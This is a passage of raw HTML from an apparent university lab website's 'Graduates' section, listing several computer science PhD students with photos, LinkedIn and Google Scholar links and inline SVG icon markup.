29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 